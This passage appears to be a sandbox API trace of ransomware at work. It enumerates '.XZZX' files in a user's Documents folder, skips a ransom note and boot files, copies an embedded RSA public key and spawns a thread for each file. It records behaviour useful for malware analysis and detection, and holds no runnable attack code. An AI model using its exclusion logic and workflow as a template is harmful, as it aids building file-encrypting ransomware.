LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.357] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0229.357] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110c [0229.357] Sleep (dwMilliseconds=0x96) [0229.512] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.513] lstrcmpW (lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpString2="..") returned 1 [0229.513] lstrcmpW (lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpString2=".") returned 1 [0229.513] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.513] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="ntldr") returned 0x0 [0229.513] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="NTLDR") returned 0x0 [0229.513] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.513] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.513] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.513] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.513] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.513] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0229.513] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1110 [0229.513] Sleep (dwMilliseconds=0x96) [0229.668] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.668] lstrcmpW (lpString1="5F3F59042CD153CCC290441930FE3814.XZZX", lpString2="..") returned 1 [0229.668] lstrcmpW (lpString1="5F3F59042CD153CCC290441930FE3814.XZZX", lpString2=".") returned 1 [0229.668] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.668] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="ntldr") returned 0x0 [0229.669] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="NTLDR") returned 0x0 [0229.669] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.669] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.669] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.669] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.669] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.669] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.669] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0229.669] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1114 [0229.669] Sleep (dwMilliseconds=0x96) [0229.824] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.824] lstrcmpW (lpString1="7E0556C23257A27A640F901F368486C2.XZZX", lpString2="..") returned 1 [0229.824] lstrcmpW (lpString1="7E0556C23257A27A640F901F368486C2.XZZX", lpString2=".") returned 1 [0229.824] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.825] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="ntldr") returned 0x0 [0229.825] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="NTLDR") returned 0x0 [0229.825] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.825] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.825] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.825] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.825] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.825] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.825] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0229.825] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1118 [0229.825] Sleep (dwMilliseconds=0x96) [0229.980] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0229.980] lstrcmpW (lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpString2="..") returned 1 [0229.980] lstrcmpW (lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpString2=".") returned 1 [0229.981] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0229.981] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="ntldr") returned 0x0 [0229.981] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="NTLDR") returned 0x0 [0229.981] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0229.981] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0229.981] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0229.981] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0229.981] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0229.981] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.981] lstrcpyW (in: lpString1=0x17cf1c, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0229.981] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x111c [0229.981] Sleep (dwMilliseconds=0x96) [0230.136] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0230.136] lstrcmpW (lpString1="A9467A821967F20598E66B961D60D64D.XZZX", lpString2="..") returned 1 [0230.136] lstrcmpW (lpString1="A9467A821967F20598E66B961D60D64D.XZZX", lpString2=".") returned 1 [0230.137] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0230.137] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="ntldr") returned 0x0 [0230.137] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="NTLDR") returned 0x0 [0230.137] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0230.137] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0230.137] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0230.137] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0230.137] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0230.137] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.137] lstrcpyW (in: lpString1=0x17cf1c, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0230.137] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1120 [0230.137] Sleep (dwMilliseconds=0x96) [0230.293] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0230.293] lstrcmpW (lpString1="AF137D37318F929FC9EC733B358876E7.XZZX", lpString2="..") returned 1 [0230.293] lstrcmpW (lpString1="AF137D37318F929FC9EC733B358876E7.XZZX", lpString2=".") returned 1 [0230.293] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0230.293] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="ntldr") returned 0x0 [0230.293] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="NTLDR") returned 0x0 [0230.293] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0230.293] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0230.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0230.293] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0230.293] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0230.293] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.293] lstrcpyW (in: lpString1=0x17cf1c, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0230.293] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1124 [0230.293] Sleep (dwMilliseconds=0x96) [0230.448] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0230.448] lstrcmpW (lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpString2="..") returned 1 [0230.448] lstrcmpW (lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpString2=".") returned 1 [0230.448] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0230.449] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="ntldr") returned 0x0 [0230.449] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="NTLDR") returned 0x0 [0230.449] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0230.449] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0230.449] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0230.449] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0230.449] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0230.449] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.449] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0230.449] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1128 [0230.449] Sleep (dwMilliseconds=0x96) [0230.606] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0230.606] lstrcmpW (lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpString2="..") returned 1 [0230.606] lstrcmpW (lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpString2=".") returned 1 [0230.606] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0230.606] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="ntldr") returned 0x0 